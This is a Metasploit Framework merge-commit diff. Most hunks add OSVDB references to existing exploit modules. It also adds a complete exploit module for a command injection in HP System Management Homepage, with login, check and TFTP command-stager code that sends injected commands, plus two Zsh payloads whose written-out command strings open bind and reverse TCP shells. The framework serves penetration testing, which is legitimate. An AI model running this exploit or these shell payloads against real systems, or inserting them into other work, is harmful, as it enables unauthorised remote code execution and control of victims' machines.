Merge branch 'master' of https://github.com/rapid7/metasploit-framework
commit
785639148c
|
@ -37,6 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2013-0422' ],
|
||||
[ 'OSVDB', '89059' ],
|
||||
[ 'US-CERT-VU', '625617' ],
|
||||
[ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],
|
||||
[ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ],
|
||||
|
|
|
@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '77492' ],
|
||||
[ 'URL', 'https://www.familycms.com/blog/2011/11/security-vulnerability-fcms-2-5-2-7-1/' ],
|
||||
[ 'URL', 'http://sourceforge.net/apps/trac/fam-connections/ticket/407' ],
|
||||
[ 'URL', 'http://rwx.biz.nf/advisories/fc_cms_rce_adv.html' ],
|
||||
|
|
|
@ -27,7 +27,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download' ],
|
||||
[ 'OSVDB', '94441' ],
|
||||
[ 'URL', 'http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download' ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
|
@ -26,7 +26,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://gitorious.org/gitorious/mainline/commit/647aed91a4dc72e88a27476948dfbacd5d0bf7ce' ],
|
||||
[ 'OSVDB', '78480' ],
|
||||
[ 'URL', 'http://gitorious.org/gitorious/mainline/commit/647aed91a4dc72e88a27476948dfbacd5d0bf7ce' ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
|
|
|
@ -33,6 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-0738' ], # using a VERB other than GET/POST
|
||||
[ 'OSVDB', '64171' ],
|
||||
[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ],
|
||||
[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=574105' ],
|
||||
],
|
||||
|
|
|
@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-0738' ], # by using VERB other than GET/POST
|
||||
[ 'OSVDB', '64171' ],
|
||||
[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ],
|
||||
[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=574105' ],
|
||||
],
|
||||
|
|
|
@ -31,8 +31,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'References' =>
|
||||
[
|
||||
['EDB', '20422'],
|
||||
['BID', '55399']
|
||||
[ 'OSVDB', '85509' ],
|
||||
[ 'EDB', '20422 '],
|
||||
[ 'BID', '55399 ']
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
|
@ -37,10 +37,11 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
],
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2012-6315'], # superseded by CVE-2013-0209 (duplicate)
|
||||
['CVE', '2013-0209'],
|
||||
['URL', 'http://www.sec-1.com/blog/?p=402'],
|
||||
['URL', 'http://www.movabletype.org/2013/01/movable_type_438_patch.html']
|
||||
[ 'CVE', '2012-6315' ], # superseded by CVE-2013-0209 (duplicate)
|
||||
[ 'CVE', '2013-0209' ],
|
||||
[ 'OSVDB', '89322' ],
|
||||
[ 'URL', 'http://www.sec-1.com/blog/?p=402' ],
|
||||
[ 'URL', 'http://www.movabletype.org/2013/01/movable_type_438_patch.html' ]
|
||||
],
|
||||
'Arch' => ARCH_CMD,
|
||||
'Payload' =>
|
||||
|
|
|
@ -22,7 +22,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [ ['URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php'] ],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2012-5159' ],
|
||||
[ 'OSVDB', '85739' ],
|
||||
[ 'EDB', '21834' ],
|
||||
[ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php' ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
|
@ -38,8 +38,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2013-0156'],
|
||||
['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156']
|
||||
[ 'CVE', '2013-0156' ],
|
||||
[ 'OSVDB', '89026' ],
|
||||
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156' ]
|
||||
],
|
||||
'Platform' => 'ruby',
|
||||
'Arch' => ARCH_RUBY,
|
||||
|
|
|
@ -29,9 +29,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://itsecuritysolutions.org/2012-08-13-TestLink-1.9.3-multiple-vulnerabilities/']
|
||||
#['OSVDB', ''],
|
||||
#['EDB', ''],
|
||||
[ 'OSVDB', '85446' ],
|
||||
[ 'EDB', '20500' ],
|
||||
[ 'URL', 'http://itsecuritysolutions.org/2012-08-13-TestLink-1.9.3-multiple-vulnerabilities/' ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
|
@ -39,9 +39,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2011-3230'],
|
||||
['URL', 'http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html#comments'],
|
||||
['URL', 'http://support.apple.com/kb/HT5000']
|
||||
[ 'CVE', '2011-3230' ],
|
||||
[ 'OSVDB', '76389' ],
|
||||
[ 'URL', 'http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html#comments' ],
|
||||
[ 'URL', 'http://support.apple.com/kb/HT5000' ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
|
|
|
@ -31,6 +31,7 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2012-3485' ],
|
||||
[ 'OSVDB', '84706' ],
|
||||
[ 'EDB', '20443' ],
|
||||
[ 'URL', 'http://blog.zx2c4.com/791' ]
|
||||
],
|
||||
|
|
|
@ -0,0 +1,178 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::CmdStagerTFTP
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "HP System Management Homepage JustGetSNMPQueue Command Injection",
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability found in HP System Management Homepage. By
|
||||
supplying a specially crafted HTTP request, it is possible to control the
|
||||
'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc),
|
||||
which will be used in a exec() function. This results in arbitrary code execution
|
||||
under the context of SYSTEM. Please note: In order for the exploit to work, the
|
||||
victim must enable the 'tftp' command, which is the case by default for systems
|
||||
such as Windows XP, 2003, etc.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Markus Wulftange',
|
||||
'sinn3r' #Metasploit
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2013-3576'],
|
||||
['OSVDB', '94191'],
|
||||
['US-CERT-VU', '735364']
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00"
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'SSL' => true
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
['Windows', {}],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Jun 11 2013",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(2381),
|
||||
# USERNAME/PASS may not be necessary, because the anonymous access is possible
|
||||
OptString.new("USERNAME", [false, 'The username to authenticate as']),
|
||||
OptString.new("PASSWORD", [false, 'The password to authenticate with'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def peer
|
||||
"#{rhost}:#{rport}"
|
||||
end
|
||||
|
||||
|
||||
def check
|
||||
cookie = ''
|
||||
|
||||
if not datastore['USERNAME'].to_s.empty? and not datastore['PASSWORD'].to_s.empty?
|
||||
cookie = login
|
||||
if cookie.empty?
|
||||
print_error("#{peer} - Login failed")
|
||||
return Exploit::CheckCode::Safe
|
||||
else
|
||||
print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
|
||||
end
|
||||
end
|
||||
|
||||
sig = Rex::Text.rand_text_alpha(10)
|
||||
cmd = Rex::Text.uri_encode("echo #{sig}")
|
||||
uri = normalize_uri("smhutil", "snmpchp/") + "&&#{cmd}&&echo"
|
||||
|
||||
req_opts = {}
|
||||
req_opts['uri'] = uri
|
||||
if not cookie.empty?
|
||||
browser_chk = 'HPSMH-browser-check=done for this session'
|
||||
curl_loc = "curlocation-#{datastore['USERNAME']}="
|
||||
req_opts['cookie'] = "#{cookie}; #{browser_chk}; #{curl_loc}"
|
||||
end
|
||||
|
||||
res = send_request_raw(req_opts)
|
||||
if not res
|
||||
print_error("#{peer} - Connection timed out")
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
if res.body =~ /SNMP data engine output/ and res.body =~ /#{sig}/
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
|
||||
def login
|
||||
username = datastore['USERNAME']
|
||||
password = datastore['PASSWORD']
|
||||
|
||||
cookie = ''
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => '/proxy/ssllogin',
|
||||
'vars_post' => {
|
||||
'redirecturl' => '',
|
||||
'redirectquerystring' => '',
|
||||
'user' => username,
|
||||
'password' => password
|
||||
}
|
||||
})
|
||||
|
||||
if not res
|
||||
fail_with(Exploit::Failure::Unknown, "#{peer} - Connection timed out during login")
|
||||
end
|
||||
|
||||
# CpqElm-Login: success
|
||||
if res.headers['CpqElm-Login'].to_s =~ /success/
|
||||
cookie = res.headers['Set-Cookie'].scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || ''
|
||||
end
|
||||
|
||||
cookie
|
||||
end
|
||||
|
||||
|
||||
def setup_stager
|
||||
execute_cmdstager({ :temp => '.'})
|
||||
end
|
||||
|
||||
|
||||
def execute_command(cmd, opts={})
|
||||
# Payload will be: C:\hp\hpsmh\data\htdocs\smhutil
|
||||
uri = Rex::Text.uri_encode("#{@uri}#{cmd}&&echo")
|
||||
|
||||
req_opts = {}
|
||||
req_opts['uri'] = uri
|
||||
if not @cookie.empty?
|
||||
browser_chk = 'HPSMH-browser-check=done for this session'
|
||||
curl_loc = "curlocation-#{datastore['USERNAME']}="
|
||||
req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}"
|
||||
end
|
||||
|
||||
print_status("#{peer} - Executing: #{cmd}")
|
||||
res = send_request_raw(req_opts)
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
@cookie = ''
|
||||
|
||||
if not datastore['USERNAME'].to_s.empty? and not datastore['PASSWORD'].to_s.empty?
|
||||
@cookie = login
|
||||
if @cookie.empty?
|
||||
fail_with(Exploit::Failure::NoAccess, "#{peer} - Login failed")
|
||||
else
|
||||
print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
|
||||
end
|
||||
end
|
||||
|
||||
@uri = normalize_uri('smhutil', 'snmpchp/') + "&&"
|
||||
setup_stager
|
||||
end
|
||||
end
|
|
@ -0,0 +1,62 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/handler/bind_tcp'
|
||||
require 'msf/base/sessions/command_shell'
|
||||
require 'msf/base/sessions/command_shell_options'
|
||||
|
||||
module Metasploit4
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Unix Command Shell, Bind TCP (via Zsh)',
|
||||
'Description' => %q{
|
||||
Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is
|
||||
often available, please be aware it isn't usually installed by default.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Doug Prostko <dougtko[at]gmail.com>'
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Handler' => Msf::Handler::BindTcp,
|
||||
'Session' => Msf::Sessions::CommandShell,
|
||||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'zsh',
|
||||
'Payload' =>
|
||||
{
|
||||
'Offsets' => { },
|
||||
'Payload' => ''
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
#
|
||||
# Constructs the payload
|
||||
#
|
||||
def generate
|
||||
return super + command_string
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the command string to use for execution
|
||||
#
|
||||
def command_string
|
||||
cmd = "zmodload zsh/net/tcp;"
|
||||
cmd << "ztcp -l #{datastore['LPORT']};"
|
||||
cmd << "ztcp -a $REPLY;"
|
||||
cmd << "while read -r cmd <&$REPLY;do eval ${cmd} >&$REPLY;done;"
|
||||
cmd << "ztcp -c"
|
||||
cmd
|
||||
end
|
||||
end
|
|
@ -0,0 +1,48 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/handler/reverse_tcp'
|
||||
require 'msf/base/sessions/command_shell'
|
||||
require 'msf/base/sessions/command_shell_options'
|
||||
|
||||
module Metasploit3
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Unix Command Shell, Reverse TCP (via Zsh)',
|
||||
'Description' => %q{
|
||||
Connect back and create a command shell via Zsh. Note: Although Zsh is often
|
||||
available, please be aware it isn't usually installed by default.
|
||||
},
|
||||
'Author' => 'Doug Prostko <dougtko[at]gmail.com>',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Handler' => Msf::Handler::ReverseTcp,
|
||||
'Session' => Msf::Sessions::CommandShell,
|
||||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'zsh',
|
||||
'Payload' => { 'Offsets' => {}, 'Payload' => '' }
|
||||
))
|
||||
end
|
||||
|
||||
def generate
|
||||
return super + command_string
|
||||
end
|
||||
|
||||
def command_string
|
||||
cmd = "zmodload zsh/net/tcp;"
|
||||
cmd << "ztcp #{datastore['LHOST']} #{datastore['LPORT']};"
|
||||
cmd << "while read -r cmd <&$REPLY;do eval ${cmd} >&$REPLY;done;"
|
||||
cmd << "ztcp -c"
|
||||
cmd
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue